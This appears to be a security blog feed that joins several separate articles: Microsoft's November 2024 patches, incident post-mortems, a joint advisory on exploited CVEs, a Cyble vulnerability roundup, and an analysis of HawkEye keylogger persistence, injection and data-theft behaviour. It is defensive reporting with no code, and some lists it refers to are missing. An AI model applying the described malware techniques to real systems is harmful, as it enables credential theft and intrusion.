With November’s Patch Tuesday Microsoft fixed 89 vulnerabilities in its products — two of which are being actively exploited. One of them — CVE-2024-43451 — is particularly alarming. It allows attackers to gain access to the victim’s NTLMv2 hash. Although it doesn’t have an impressive CVSS 3.1 rating (only 6.5 / 6.0), its exploitation requires minimal interaction from the user, and it exists thanks to the MSHTML engine — the legacy of Internet Explorer — which is theoretically deactivated and no longer used. Nevertheless, all current versions of Windows are affected by this vulnerability.
Why is CVE-2024-43451 so dangerous?
CVE-2024-43451 allows an attacker to create a file that, once delivered to the victim’s computer, will give the attacker the possibility of stealing the NTLMv2 hash. NTLMv2 is a network authentication protocol used in Microsoft Windows environments. Having access to the NTLMv2 hash, an attacker can perform a pass-the-hash attack and attempt to authenticate on the network by posing as a legitimate user — without having their real credentials.
Of course, CVE-2024-43451 alone is not enough for a full-fledged attack — cybercriminals would have to use other vulnerabilities — but someone else’s NTLMv2 hash would make the attacker’s life much easier. At this point in time we have no additional information about scenarios that use CVE-2024-43451 in practice, but the vulnerability description clearly states that the vulnerability is publicly disclosed, and cases of exploitation have been detected in the wild.
What does “minimal interaction” mean?
It is generally assumed that if a user doesn’t open a malicious file — nothing bad can happen. In this case, that’s not true. According to the mini-FAQ in the security update guide advisory on CVE-2024-43451, exploitation may occur even when the user selects the file (single left-click), inspects it (with a right-click), or performs some “action other than opening or executing”.
What other vulnerabilities did Microsoft close in the November patch?
The second vulnerability that is already being exploited in real attacks is CVE-2024-49039. It allows attackers to escape from the AppContainer environment and, as a result, escalate their privileges to a Medium Integrity Level. In addition, there are two more holes that the company states are disclosed, although they’ve not yet been noticed in real attacks. These are CVE-2024-49019 in the Active Directory Certificate Service, which also allows the attacker to elevate privileges, and CVE-2024-49040 in Exchange, thanks to which malicious emails can be displayed with a fake sender address.
In addition, the critical vulnerability CVE-2024-43639, which allows remote code execution in Kerberos, also looks dangerous — though it only affects servers that are configured as a Kerberos Key Distribution Center (KDC) Proxy Protocol server.
How to stay safe?
In order to stay safe, we recommend, firstly, promptly installing updates for critical software (which, of course, includes the operating systems). In addition, it’s worth remembering that most attacks exploiting software vulnerabilities begin via email. Therefore, we recommend equipping all work devices with a reliable security solution, and not forget about protection at the mail gateway level.
Serious cybersecurity incidents often impact many different parties — including those who don’t typically handle IT or security matters on a daily basis. Of course, the initial response needs to focus on identifying, containing, and recovering from an incident. But once the dust has settled, the time comes for another crucial stage: learning from the experience. What can the incident teach us? How can we improve our chances of preventing similar attacks in the future? These questions are well worth answering — even if the incident caused no significant damage due to an effective response or simply luck.
Involving people
Incident analysis is important for the whole organization. It’s crucial to involve not only IT and security teams but also senior management and IT system stakeholders, as well as any third-party vendors affected by the incident or involved in its response. A productive atmosphere is crucial. It’s important to emphasize that this isn’t a witch hunt (though mistakes will be discussed). Blame-shifting and manipulating information will only distort the picture, hinder analysis, and harm the organization’s long-term security.
Many companies keep incident details under wraps, fearing reputational damage or a repeat attack. While this is completely understandable, and certain details should indeed remain confidential, striving for maximum transparency in response is important. Specifics of an attack and response should be shared, if not with the general public, then at least with a trusted circle of peers in the cybersecurity field who can then help others prevent similar attacks on their organizations.
Detailed incident analysis
Although much incident data is already collected during the response phase, post-incident analysis provides an opportunity for deeper insights. First of all, answer questions like: How and when did the adversary penetrate the organization? What vulnerabilities and technical/organizational weaknesses were exploited? How did the attack unfold? Mapping attacker actions and response efforts on a timeline helps pinpoint when anomalies were detected, how they were identified, what response measures were taken, whether all relevant teams were promptly engaged, and if escalation scenarios were followed.
The answers to these questions should be documented meticulously, referencing factual data like SIEM logs, timestamps for task creation in the task manager, timestamps for emails being sent, and so on. This enables you to build a comprehensive and detailed picture, allowing for collective evaluation of both the speed and effectiveness of each response step.
It’s also necessary to separately assess an incident’s impact on other aspects of the business, such as continuity of operations, data integrity and leaks, financial losses (both direct and indirect), and company reputation. This will help balance the scale and cost of the incident against the scale and cost of measures to strengthen information security.
Identifying strengths and weaknesses
Technical incident reports may seem to contain all the information you need, but in reality they often lack crucial organizational context. A report might state that attackers accessed the system by exploiting a certain vulnerability, and that the organization needs to patch said vulnerability on all servers. However, this superficial analysis overlooks critical questions: How long did this vulnerability remain unpatched after it was disclosed? What other known vulnerabilities exist on the servers? What are the agreed-upon patching SLAs between IT and cybersecurity? Does vulnerability prioritization exist within the company?
Each stage and process affected by the incident deserves this level of scrutiny. This holistic approach allows to assess the security landscape flaws that enabled the incident. It’s important not to focus solely on the negatives: if certain teams responded quickly and effectively or if existing processes/technologies aided in incident detection or mitigation, these aspects should also be analyzed to understand whether this positive experience can be applied elsewhere.
Human error and behavioral factors warrant special attention. What role did they play? Again, the goal isn’t to blame but to identify measures to mitigate or balance the inevitable impact of human factors in the future.
Planning for improvement
This is the most creative and organizationally challenging phase of the incident review. It requires developing effective, realistic steps to address weaknesses within resource constraints. Involving senior management in this process is especially beneficial — as the saying goes, cybersecurity budgets are never approved faster than after a major incident. Several aspects should be considered in the plan:
IT asset map update. The incident may have revealed a lot of new information about how the company’s data is processed and how processes are implemented in general. It’s often necessary to update priorities, reflecting a better understanding of which assets require the most protection.
Detection and response technologies. By analyzing which stages of the attack went undetected by defenders, and which technical measures were missing to stop the attack’s progression, the team can plan to implement additional security tools, such as EDR, SIEM, and NGFW. Sometimes it becomes clear that while the necessary tools seem to be in place, they lack automation (for example, automated response playbooks), or data streams (such as threat intelligence feeds). Or, perhaps, log storage practices facilitated their wholesale deletion by the attackers. Technology enhancements should receive special attention if the analysis showed that defenders spent an excessive amount of time manually searching for compromised hosts or other laborious tasks, lacked access to critical information, or didn’t have the tools for enterprise-wide response.
Processes and policies. Having determined whether the incident occurred due to violations of existing policies or their absence, it’s essential to address this by revisiting the entire chain of events, correcting any identified process deficiencies, and reflecting these corrections in the security policy. Ranging from processes, policies, and regulatory timelines for vulnerability and account management, to incident response playbooks — the revised company processes should ensure the prevention of any similar future incidents.
The overall incident response plan should also be updated and refined based on practical experience. It’s important to clarify which parties were unable to fully participate in the process, and how to organize rapid communication between them to ensure swift decision-making in emergencies.
Proactive measures: technology. Incidents provide an opportunity to take a fresh look at existing practices for account management and patch management. Step-by-step improvements should be planned in areas where the company hasn’t followed best practices: implementing the principle of least privilege and centralized identity management, and prioritizing and systematically addressing key infrastructure vulnerabilities.
Proactive measures: people. Each human error requires corrective measures — targeted training or even drills tailored to individual roles. It’s worth discussing what training is necessary for specific individuals, departments, or the entire organization. A major incident can be a powerful wake-up call, emphasizing the importance of information security and driving engagement in cybersecurity awareness training, even among those who usually downplay its importance.
Following updated processes may be more challenging — requiring a special effort in training. Reminders from management and an incentive program may be necessary to ensure the updated regulations are fully adopted.
Preparing for the next incident
All of the measures listed above will enhance cybersecurity resilience, and readiness for incidents — in theory. But to be sure of the result, it’s worth validating their effectiveness through cybersecurity exercises, penetration testing, or red teaming. These simulations of real cyber-incidents serve different purposes, so which combination is most suitable depends on the organization and the measures taken post-incident.
Implementing all the improvements and updated security measures can be a lengthy, phased process, so regular meetings with all involved parties are necessary to collect feedback, discuss implementation, address challenges, and explore further security enhancements. To ensure these meetings are not mere empty talk, it’s essential to agree on specific metrics and milestones to track progress effectively.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png2024-11-13 18:06:362024-11-13 18:06:36How to prevent company from getting hacked again | Kaspersky official blog
Common vulnerabilities in 2023 include Citrix NetScaler, Fortinet FortiOS, and Atlassian Confluence, with attacks involving remote code execution, buffer overflows, and session token leakage.
The advisory was coauthored by international agencies, including ACSC, CISA, the FBI, and cybersecurity bodies from Canada, New Zealand, and the UK, highlighting global collaboration in combating cyber threats.
Exploited vulnerabilities often stem from code injection, buffer overflows, and improper input validation, emphasizing the need for secure coding practices.
Organizations should implement security by design, adopt secure software development frameworks, and prioritize patch management to protect against known vulnerabilities.
The advisory recommends deploying tools like EDR systems and employing Zero Trust Network Architecture (ZTNA) to detect zero-day exploits and limit lateral movement within networks.
Overview
The Australian Cyber Security Center (ACSC) has issued an important cybersecurity advisory detailing a range of vulnerabilities in 2023. The report, which was coauthored by cybersecurity agencies from the United States, Australia, Canada, New Zealand, and the United Kingdom, provides a comprehensive overview of the vulnerabilities most targeted by cybercriminals, including the risks posed by zero-day exploits.
These advisory aims to inform organizations worldwide about the growing cyber threat landscape and offers guidance to minimize the risks posed by these vulnerabilities. The ACSC’s advisory identifies the most frequently exploited Common Vulnerabilities and Exposures (CVEs) of 2023 and their associated Common Weakness Enumerations (CWEs).
This security advisory is a collaborative effort from cybersecurity agencies around the world, including the Australian Cyber Security Center (ACSC), the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and cybersecurity agencies from Canada, New Zealand, and the United Kingdom.
In particular, CISA has worked closely with international partners to monitor, identify, and mitigate common vulnerabilities, reinforcing their shared commitment to securing digital infrastructure. The FBI has also been actively involved in identifying cyber threat actors exploiting these vulnerabilities, especially those targeting critical infrastructure in both the public and private sectors.
Key Findings: Zero-Day Exploits on the Rise
One of the most concerning trends identified in the advisory is the increasing exploitation of zero-day vulnerabilities. These vulnerabilities, which are unknown to the software vendor or the public at the time of exploitation, allow attackers to bypass security defenses and gain unauthorized access to systems.
In 2023, cybercriminals used zero-day vulnerabilities to exploit systems rapidly after their disclosure. Notably, these exploits were used to compromise high-value targets, including organizations in critical sectors such as healthcare, finance, and government.
The ACSC’s advisory highlights that reducing the lifespan of zero-day exploits can be achieved by improving security lifecycles and ensuring responsible vulnerability disclosure. Both vendors and developers are urged to adopt secure-by-design principles and frameworks like the SP 800-218 Secure Software Development Framework (SSDF) to enhance the security of software from the ground up.
Top Vulnerabilities Exploited in 2023
The advisory identifies several CVEs that were routinely exploited in 2023. Among the most frequently targeted vulnerabilities are:
These vulnerabilities were exploited by a variety of cyber threat actors, including advanced persistent threat (APT) groups and ransomware operators. For instance, CVE-2023-34362, which affects the MOVEit Transfer product, was actively targeted by the CL0P ransomware gang. Similarly, CVE-2023-22515 in Atlassian Confluence was exploited by threat actors to gain unauthorized access to corporate networks, compromising sensitive data.
In many cases, these exploits were used to execute remote code, bypass authentication, or escalate privileges within affected systems. These vulnerabilities often result in significant disruption, financial loss, and reputational damage to affected organizations.
Common Weakness Enumerations (CWEs)
The advisory also sheds light on the associated Common Weakness Enumerations (CWEs) that underlie many of the vulnerabilities exploited in 2023. For example:
CWE-94: Code injection, which was present in vulnerabilities like CVE-2023-3519 (Citrix NetScaler buffer overflow).
CWE-119: Buffer overflow, as seen in CVE-2023-4966 (Citrix NetScaler session token leakage).
CWE-20: Improper input validation, which was implicated in CVE-2023-22515 (Atlassian Confluence arbitrary code execution).
By understanding the CWEs associated with these CVEs, organizations can implement more targeted defenses to mitigate the risk of exploitation. Developers are encouraged to adopt practices that prevent these weaknesses from being introduced in the first place, such as using memory-safe languages and conducting regular security testing.
Recommendations for Vendors, Developers, and End-Users
In response to these findings, the advisory provides several key recommendations for organizations and developers to enhance their cybersecurity posture and reduce the risk of exploitation:
Vendors are encouraged to integrate security into the development process from the start, using frameworks like SP 800-218 SSDF to guide their efforts.
Developers should ensure that vulnerabilities are disclosed responsibly, including the root causes and associated CWEs, to help the broader community implement effective mitigation measures.
Regularly applying patches is critical to mitigating known vulnerabilities. End-users should also implement centralized patch management systems to streamline the process and ensure that vulnerabilities are addressed promptly.
Security tools like EDR systems are essential for detecting zero-day exploits. Organizations should prioritize their deployment to help identify suspicious activities and mitigate risks before they escalate.
Employing a Zero Trust Network Architecture (ZTNA) can help reduce lateral movement within networks and limit the damage from compromised systems. Organizations should also enforce multi-factor authentication (MFA) to prevent unauthorized access.
Organizations are urged to have up-to-date incident response plans in place and ensure that system backups are securely stored and regularly tested to recover from potential attacks.
Conclusion
The Australian Cyber Security Center (ACSC), in partnership with CISA, the FBI, and other international cybersecurity agencies, is calling on vendors, developers, and end-users to take immediate action to address these vulnerabilities and enhance their overall cybersecurity posture.
By following the advisory’s recommendations, organizations can reduce their exposure to cyber threats and strengthen their defenses against cyberattacks. The collaboration between global cybersecurity agencies emphasizes the importance of shared intelligence and international cooperation in the fight against cybercrime.
Cyble Research and Intelligence Labs (CRIL) researchers investigated 18 vulnerabilities and 10 dark web exploits in the last week – including an actively exploited Fortinet vulnerability with nearly 1 million exposed assets on the internet.
Other vulnerabilities analyzed by Cyble affect third-party Windows drivers, SharePoint, Qualcomm, Android, QNAP and more.
Here are the vulnerabilities highlighted by Cyble as meriting high-priority attention by security teams.
CVE-2024-23113: FortiOS Format String Vulnerability
CVE-2024-23113 is a critical format string vulnerability affecting Fortinet’s FortiOS, specifically within the FGFM (FortiGate to FortiManager) service. The vulnerability could allow unauthenticated remote code execution (RCE) by malicious actors.
While the vulnerability dates from February, CISA added it to its Known Exploited Vulnerabilities (KEV) catalog last month, and Cyble researchers have seen multiple exploits and proofs of concept (PoC) targeting the vulnerability discussed on the dark web and in cybercrime forums.
CVE-2024-50550: LiteSpeed Cache plugin for WordPress
Another vulnerability with wide exposure is CVE-2024-50550, a critical privilege escalation vulnerability in LiteSpeed Cache plugin for WordPress, which is installed on over 6 million websites. Cyble honeypot sensors recently detected attacks on a different LiteSpeed vulnerability (CVE-2024-44000) and another WordPress plugin.
Cyble researchers said the new LiteSpeed vulnerability “could be leveraged to access backend databases as well to install arbitrary plugins or sniffers, leading attackers to exfiltrate payment card data and sensitive information of users,” as well as altering web pages.
CVE-2021-41285 and CVE-2020-14979: Windows Drivers
CVE-2021-41285 and CVE-2020-14979 are high-severity vulnerabilities in drivers that could allow attackers to achieve local privilege escalation to NT AUTHORITYSYSTEM in Windows Systems. A newly identified malware called “SteelFox” has been observed mining for cryptocurrency and stealing credit card data by using the “bring your own vulnerable driver” (BYOVD) technique to create a service that runs WinRing0.sys inside vulnerable drivers, leading to privilege escalation.
CVE-2024-38094: Microsoft SharePoint
CVE-2024-38094 is a high-severity remote code execution vulnerability affecting Microsoft SharePoint. Microsoft recently disclosed that the vulnerability is being exploited to gain initial access to corporate networks by attackers. Researchers also observed that attackers are targeting vulnerable SharePoint servers using publicly disclosed SharePoint proof-of-concept exploit code to plant a web shell that they later leverage to gain privileges and pivot into the compromised network.
CVE-2024-43047 and CVE-2024-43093: Android Kernel Components
CVE-2024-43047 is a high-severity use-after-free issue in closed-source Qualcomm components within the Android kernel that can lead to elevated privileges. CVE-2024-43093 is also a high-severity elevation of privilege flaw, impacting the Android Framework component and Google Play system updates, specifically in the Documents UI. Recently Google fixed both of the actively exploited zero-day flaws as part of its November security updates.
CVE-2024-8956 and CVE-2024-8957: PTZ Cameras
CVE-2024-8956 and CVE-2024-8957 impact PTZ cameras, which are extensively used in organizations around the world for applications such as live streaming, security surveillance, and conference automation. The critical vulnerabilities can also be chained by attackers to execute arbitrary OS commands on these devices, as well as access sensitive data such as usernames, password hashes, and device configuration details.
CVE-2024-10443: Synology NAS Devices
CVE-2024-10443 is a critical vulnerability in Synology’s BeeStation and DiskStation NAS devices, specifically within the BeePhotos and SynologyPhotos applications, which are designed to provide user-friendly personal cloud storage solutions. The vulnerability can allow remote attackers to execute arbitrary code. As NAS devices are commonly used to store sensitive data by both home and enterprise customers, Cyble researchers have assessed that attackers could attempt to leverage the vulnerability to breach the systems and steal data.
CVE-2024-50387: QNAP
CVE-2024-50387: This as of yet unclassified vulnerability detailed in a QNAP advisory was revealed at Pwn2Own 2024. It is a critical SQL injection (SQLi) vulnerability impacting QNAP’s SMB Service, which is the vendor’s implementation of the Server Message Block (SMB) protocol within QNAP NAS devices, enabling file sharing and network services across Windows and other operating systems.
Dark Web and Cybercrime Forum Exploits
Here are 7 vulnerabilities and exploits that Cyble researchers observed under active discussion on underground forums and Telegram channels, plus claims of zero-day vulnerabilities for sale in Palo Alto Networks and Microsoft products.
CVE-2024-6778: A high-severity vulnerability affecting the Chromium web browser prior to version 126.0.6478.182. The vulnerability arises from a race condition in the DevTools component. An attacker can convince a user to install such an extension, allowing them to inject arbitrary scripts or HTML into privileged pages, thereby facilitating a sandbox escape.
CVE-2024-46538: A critical cross-site scripting (XSS) vulnerability identified in pfSense version 2.5.2. This vulnerability allows attackers to execute arbitrary web scripts or HTML by injecting a ‘crafted payload’ into the $pconfig variable, specifically through the ‘interfaces_groups_edit.php’ file.
CVE-2024-44193: A vulnerability affecting Apple iTunes for Windows, specifically versions prior to 12.13.3. The vulnerability allows local attackers to potentially elevate their privileges on affected systems, posing significant security risks.
CVE-2024-39205: A critical vulnerability affecting pyload-ng, versions 0.5.0b3.dev85 running under Python 3.11 or below. This vulnerability allows attackers to execute arbitrary code through crafted HTTP requests, which can lead to complete system compromise.
CVE-2024-40711: A critical vulnerability in Veeam Backup & Replication software classified as a deserialization of untrusted data issue. This vulnerability allows unauthenticated remote code execution (RCE), enabling attackers to execute arbitrary code on affected systems without requiring any authentication.
CVE-2024-0311: A cybersecurity vulnerability identified in the Skyhigh Client Proxy, this flaw allows a malicious insider to bypass existing security policies without needing a valid release code, which can potentially lead to unauthorized access to sensitive data or applications.
CVE-2024-20419: The critical vulnerability affecting Cisco’s Smart Software Manager On-Prem (SSM On-Prem) arises from improper validation in the password change functionality, allowing unauthenticated remote attackers to change user passwords without prior knowledge of the existing password.
Cyble researchers also observed zero-day vulnerabilities being offered for sale on dark web forums, including a remote code execution (RCE) vulnerability in Palo Alto’s PAN-OS, and a privilege escalation (LPE) vulnerability in Windows that a threat actor was asking US$200,000 to $400,000 for. Palo Alto issued an advisory stating that it is aware of the PAN-OS claim.
Cyble Recommendations
To protect against these vulnerabilities and exploits, organizations should implement the following best practices:
To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.
Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.
Conclusion
These vulnerabilities highlight the urgent need for security teams to prioritize patching critical vulnerabilities in major products and those that could be weaponized as entry points for wider attacks. With increasing discussions of these exploits on dark web forums, organizations must stay vigilant and proactive. Implementing strong security practices is essential to protect sensitive data and maintain system integrity.
Editor’s note: The current article is authored by the threat researcher Aaron Jornet Sales, also know as RexorVc0. You can find him on X and LinkedIn.
HawkEye, also known as PredatorPain (Predator Pain), is a malware categorized as a keylogger, but over the years, it has adopted new functionalities that align it with the capabilities of other tools like stealers.
History of HawkEye
HawkEye emerged before 2010, with records of its use and sale dating back to 2008, making it quite long-lived. After several spearphishing campaigns in which this well-known malware was attached, it gained significant popularity starting in 2013.
This keylogger has been available on various dark web sites, even having dedicated websites where the tool was sold. However, this keylogger has been cracked for years and used by different actors without going through the subscription method imposed by its creators, whose price ranged between $20 and $50. This has contributed to its continued notoriety, and it has been used not only by criminal actors but also by script kiddies due to its ease of use.
Although it is not one of the most widely used malwares, it remains in active use and saw a significant resurgence during the COVID period. During this time, certain actors took advantage of the general hysteria to obtain company data through phishing campaigns.
Additionally, HawkEye has been used in conjunction with other loaders and/or malware that invoked this keylogger. Over its long trajectory, various actors and malware have been involved in attacks on companies, some of which include Galleon Gold, Mikroceen, iSPY crypter related with Gold Skyline, Remcos used on campaigns with HawkEye, Pony used on campaigns with HawkEye, etc.
Technical Analysis
The method of HawkEye’s delivery has varied throughout its history, as have the types of sources behind the attacks. Nevertheless, it has been primarily involved in spearphishing campaigns, where attackers devised convincing scenarios to trick victims into downloading the malicious file, which could be a document, compressed file, or another malware acting as a loader for the keylogger.
It has also been used to target websites of portals typically accessed by companies, which were the main targets of the attacking groups. Another common method of spreading HawkEye was through “free” software, which turned out to be malware in disguise.
HawkEye’s delivery methods are quite diverse compared to other malware. However, its execution and behavior have remained relatively consistent over the years. A behavior graph of what has been observed in recent months would look as follows:
HawkEye graph
During the analysis process, I typically spend weeks, even months, collecting samples to understand how they function as a whole based on the existing variants. Therefore, we may observe variations among those presented. In most executions, we encounter enormous trees of processes based on their activities.
To simplify, as you’ve seen in the previous graph, it’s not as complex compared to other stealers or RATs. It generally consists of an executable that drops others in temporary paths, then injects code into one of them or into a .NET-related software. Later, in memory, it gathers all possible data and sends it to a C&C.
ProcDOT detonation chart
Going straight to the point, in an initial execution of one of the samples I analyzed, we see a rather extensive process—a succession of execution copies launched in temporary paths.
Process Tree execution (Image 1)
Process Tree execution (Image 2)
In this instance, they used the RoamingTemplates path, but this is highly variable depending on who created it. Generally speaking, they tend to abuse paths like AppDataRoaming and AppDataTemp, which are classic choices.
Paths commonly abused (Image 1)
Paths commonly abused (Image 2)
Paths commonly abused (Image 3)
Here’s the list of paths observed for dropping files:
All of these files that are launched, and which we’ve observed executing in the previous step, are copies of themselves. The filenames are also highly variable, as you might expect, but they often try to have an icon that makes the victim think it’s a legitimate program, or the malware description might be altered to make it seem like legitimate software.
Analyze malware and phishing threats inside ANY.RUN’s Interactive Sandbox
Ultimately, after comparing the dropped files, we can see they are simple copies of the original, with the particularity that some versions launch them in hidden mode, so you can’t see them unless you’ve enabled the “View hidden files” function in Windows.
Hidden files duplication graph
During these file droppings, we can encounter both replicas of the original file in different paths, as well as support files whose functionality is typically to establish persistence (or check if it’s already done, and if not, do it) and to perform injector functions, which is a characteristic of this malware. In this case, the smaller binary is responsible for these actions.
Injector written in temporary folder
I check to see if there is any shared information between the two binaries and notice that certain parts of the code match the original. This will become relevant later, as right now we’re seeing them separately, but everything will make sense afterward.
Comparison of the injector and the Hawkeye bin
After this step, we can see how persistence is established. PredatorPain isn’t just a malware that establishes persistence once—it’s been observed to check and establish persistence up to three different times, depending on the phases (Loader > Injector > Payload).
This makes it clear that the malware is determined to persist on the system, one way or another. At this stage, to avoid revealing persistence mechanisms through strings, it obfuscates a string and then decodes it to introduce, in this case, one of the binaries launched earlier. This practice isn’t as common and adds a level of sophistication not found in other samples.
Hawkeye persistence in registers
Not only does it create persistence in the registry, but we also find samples that establish persistence in tasks using commands like the following:
After observing its behavior in the early stages, we delve deeper into the entire execution thread throughout the analysis phase with debugging. I’ve followed several samples, and they’re mostly similar—samples in .NET, sometimes obfuscated with tools like Confuser, Eaz, Reactor, or similar, which are relatively easy to deobfuscate.
Hawkeye code obfuscated
In most samples, I noticed heavy interaction with resources, which will become crucial shortly since I observed a significant amount of data in these resources across most of the samples I found.
Resources data content (Image 1)
Resources data content (Image 2)
In the malware’s initial phases, it looks for the running process (which will be the previously prepared copy), where it will check the PID to access the resources. Within these resources, we see two distinct types of code: the initial part, which acts as a key, and the data chunk, which is what will be deobfuscated. To achieve this, it uses XOR + Poly, and at the end of the process, it extracts a Portable Executable.
Graph of binary load from resources
It can do this in various ways depending on the sample, but we see the same extraction of a binary from a resource as we do from obfuscated code in memory, like the example shown below.
Graph of PE extraction from memory
The result of this phase is two extracted files—one will be the injector, and the other will be the Keylogger.
Extracted Injector
Extracted Keylogger
I compared both files, and they’re entirely different, in size, in structure—the only common factor is that both are .NET binaries.
Binary comparison
To highlight the difference between the injector dropped on disk (Right) and the one extracted from memory (Left), we can compare the extended content. We can observe how the memory-extracted injector includes imports related to injection that the disk version doesn’t (such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, etc.).
Extracted and dropped injector comparison
Extracted and dropped injector comparison
Here we can observe various functionalities while extracting the binaries, such as self-deletion. This is done to maintain evasion and avoid revealing its location, as it drops replicas of the original binary in various locations, as we saw earlier.
Self-deletion and self-copy of the original binary (Image 1)
Self-deletion and self-copy of the original binary (Image 2)
Self-deletion and self-copy of the original binary (Image 3)
Self-deletion and self-copy of the original binary (Image 4)
One of the dropped files, the smaller one, acts as the injector. When extracted from memory, it has more functionalities than the one seen on disk. This is because the injection tasks are carried out during runtime, but the written file is actually a portion of this, triggering the main binary located in the temporary path.
It checks persistence and restarts the entire process, including injection. Therefore, it’s a part of the file without revealing all of its functionalities. I’ll show you how it performs injection using Process Hollowing.
Graph of the process injection
In essence, the injector doesn’t have much more functionality. It includes a phase where it checks running processes, which is an interesting technique to detect analysis tools or to determine if the process is already running. If not, it launches the process, adds it to the registry (as seen earlier), and restarts the execution.
Process collection routine (Image 1)
Process collection routine (Image 2)
Process collection routine (Image 3)
Lastly, we only have the second extraction left to observe, which is HawkEye itself. I’ve encountered many versions of it, as the modules included will vary significantly based on what the creator configures in the builder of the Keylogger itself.
Learn to analyze cyber threats
See a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis
Read full guide
We’ll talk more about this later, but you can see all the functionalities that can be added during its creation, which will impact the modules incorporated into it.
Comparison between crack and extracted keylogger features (Image 1)
Comparison between crack and extracted keylogger features (Image 2)
At this point, I conducted tests with several builders to verify this theory, as I had extracted multiple samples to the final phase, and almost none of them resembled each other too much. I tested by removing or adding options, and even with the same sample, there were significant differences, so you can imagine how different it can be if it’s not exactly the same version of the keylogger and different elements were selected during its creation.
Comparison between crack and extracted keylogger
At this stage, we just need to examine the payload’s functionalities. Upon first glance, we can see strings that reveal its nature—this sample didn’t expect anyone to reach this point, as it has three well-defined phases that conceal its tracks, but here we can see many indicators of what it is.
Overview of the extracted HawkEye (Image 1)
Overview of the extracted HawkEye (Image 2)
During the execution of this specific module, we can observe it invoking vbc.exe as it injects the payload into this process, using the same techniques we’ve previously seen.
Execution of HawkEye’s final stage (Image 1)
Execution of HawkEye’s final stage (Image 2)
Execution of HawkEye’s final stage (Image 3)
Regarding the modules it brings, I compared three different samples, and they are quite similar in terms of what they can do. The general functionalities that typically match include:
Keylogging (Monitoring and stealing keyboard and clipboard data)
System information gathering (OS, HW, Network)
Credential theft (Mail, FTP, browsers, video games, etc.)
Wallet theft
Screenshot capture
Security software detection
Analysis tools detection (Dbg, traffic, etc.)
Persistence (usually via registry keys or Tasks)
Information exfiltration through various methods (FTP, HTTP, SMTP, etc.)
Graph of payload module diffing
Calling HawkEye a keylogger is really an oversimplification, as it performs more functions than many stealers I’ve seen. Once injected into vbc.exe or other processes, it carries out various actions mentioned above.
Graph of HawkEye functionality
Outro
As we discussed earlier, different groups have used this keylogger, as well as independent criminals or even script kiddies. In my research, I found different places where this keylogger was sold—there were up to 4-5 different sites, as it changed developers and domains over time, which is quite common.
HawkEye webpage
It has also been distributed through cracks, where it was sold or offered on forums to members, avoiding the usual membership fees or markets, offering it for very low payments compared to the standard price, which as we mentioned earlier, ranged from $20 to $50.
HawkEye product sales
It’s always important with these kinds of tools to locate the original software in different versions to understand how it works from both the victim’s and the attacker’s perspectives, so we can get a complete view of the malware
Here, we can see that the builder provides a multitude of configuration options, allowing us to choose where to send the stolen information (email, FTP, etc.), what we want to collect (browser info, FTP credentials, mail, etc.), whether to check for certain tools, establish persistence, delete data, download from a domain (this could function as a downloader for other malware), change the payload data to make it appear like legitimate software (e.g., changing the icon, description, etc.). As you can see, it’s incredibly comprehensive. After compiling, we’ll have our complete Keylogger, Stealer, or Downloader (call it what you will, as it does everything) ready to use.
Graph of HawkEye builder
I don’t want to repeat myself too much, but when comparing the versions we’ve seen and extracted with the ones we created ourselves, they function exactly the same—same injections, persistence, data theft (or whatever was chosen in the builder). Therefore, in telemetry, we won’t find any surprises, as you can see below.
Graph of HawkEye builded execution
After analyzing all of this, I hope you are as impressed as I am by the sheer versatility and longevity HawkEye has displayed over the decades. It’s truly a tremendously powerful and easy-to-use tool that, unfortunately, we will continue to see in security incidents from actors of all types.
Finally, I would like to thank you for reading this analysis and for supporting me.
About ANY.RUN
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
With ANY.RUN you can:
Detect malware in seconds
Interact with samples in real time
Save time and money on sandbox setup and maintenance
The Patch Tuesday for November of 2024 includes 89 vulnerabilities, including four that Microsoft marked as “critical.” The remaining vulnerabilities listed are classified as “important.”
Microsoft assessed that exploitation of the four “critical” vulnerabilities is “less likely.”
CVE-2024-43639 is a remote code execution vulnerability in Windows Kerberos that could be exploited by an attacker by creating a specially crafted application to leverage a vulnerable cryptographic protocol. While considered “critical” it was determined that exploitation is “less likely” and not been detected in the wild.
CVE-2024-43625 is a privilege escalation vulnerability in a VMSwitch driver, which is a networking component of Hyper-V. An attacker could exploit this by sending a specific series of network packets to the driver to trigger a “use after free” vulnerability in the Hyper-V host, allowing the attacker to execute arbitrary code with elevated privileges.Although classified as “critical,” exploitation was deemed “less likely” and the attack complexity considered “high.” Microsoft has not detected active exploitation of this vulnerability in the wild.
CVE-2024-43602 is a remote code execution vulnerability in Azure CycleCloud. Although marked as “critical,” Microsoft has determined that exploitation is “less likely.” If an attacker has gained basic user privileges they may be able to exploit this by sending specially crafted packets to the Azure CycleCloud cluster to gain root privileges. Microsoft has not detected active exploitation of this vulnerability in the wild.
CVE-2024-43498 is a “critical” remote code execution vulnerability in .NET and Visual Studio. Microsoft has assessed exploitation of this vulnerability as “less likely.” A remote attacker could exploit a vulnerable .NET web app by sending specially crafted packets, or loading a specially crafted file into a vulnerable application. In the wild exploitation of this vulnerability has not been detected by Microsoft.
Of the vulnerabilities included in the release, several “important” updates were listed as “exploitation more likely”. These updates are listed below:
